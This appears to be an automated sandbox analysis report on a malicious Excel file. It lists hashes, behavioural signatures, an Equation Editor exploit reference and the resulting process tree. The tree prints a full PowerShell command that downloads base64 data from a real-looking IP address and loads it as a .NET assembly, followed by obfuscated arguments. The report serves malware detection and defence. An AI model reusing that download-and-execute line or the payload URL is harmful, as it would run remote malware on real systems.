Analysis

  • max time kernel
    64s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    16/05/2023, 08:02

General

  • Target

    1498a673c6789a18bea45e231b3f33cc.xlsx

  • Size

    805KB

  • MD5

    1498a673c6789a18bea45e231b3f33cc

  • SHA1

    aba3fe52930cd671a73eebe8cf7e4b2f693a2137

  • SHA256

    26c75f92dfbba046c472343b64987a309042e9e86c9393f46fb0d3cbe1ed38dd

  • SHA512

    b1e237285263029c8dab4fa3f7f8a3fefd351d51c69857a32ca33950d5af432fc23d49835f65da6e23c5b0cc3aa0b558f08b2bf0cb0f72f766e43aa9baf78a43

  • SSDEEP

    12288:8hxaTmOW1C+7D9qUclk8n1eKsvikcnKVJUpbvfoPPUuDuqu39yBhglPnu:8hH1CEDuLs6k20Ulvf4Uufuty2m

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://172.174.176.153/dll/new_rump_vb.net.txt

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1498a673c6789a18bea45e231b3f33cc.xlsx
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1764
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\trosinlapo.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1888
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.anosino4}�ø▶4*●*☞#:▶nimo∞*▲◀(r4}�ø▶4*●*☞#:▶l!}(ú░}.s∞*▲◀(noi!}(ú░}aø☀☞√�}П�ropmi∞*▲◀(li↓*(▲☟@*⇝!}(ú░}4*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
        3⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1500

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\trosinlapo.vbs

          Filesize

          222KB

          MD5

          3b1e66773f7f07de88b2c974bbf38ae8

          SHA1

          a0b40233981a8329d2bcea5fe05778daafe5769e

          SHA256

          1bee5998ed9a33be91c576c7d499c66662c6011ef468f0902a3e8c37c56b4b2a

          SHA512

          ec5ce555eb112ae143c37054995b98cefe03cd918ecba7344965af3f4dc3fd76a55590288e13f066ed7e0f2bcae139542bab361b231410b663521660197f5fb7

        • C:\Users\Admin\AppData\Roaming\trosinlapo.vbs

          Filesize

          222KB

          MD5

          3b1e66773f7f07de88b2c974bbf38ae8

          SHA1

          a0b40233981a8329d2bcea5fe05778daafe5769e

          SHA256

          1bee5998ed9a33be91c576c7d499c66662c6011ef468f0902a3e8c37c56b4b2a

          SHA512

          ec5ce555eb112ae143c37054995b98cefe03cd918ecba7344965af3f4dc3fd76a55590288e13f066ed7e0f2bcae139542bab361b231410b663521660197f5fb7

        • memory/1500-82-0x0000000002660000-0x00000000026A0000-memory.dmp

          Filesize

          256KB

        • memory/1500-83-0x0000000002660000-0x00000000026A0000-memory.dmp

          Filesize

          256KB

        • memory/1764-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB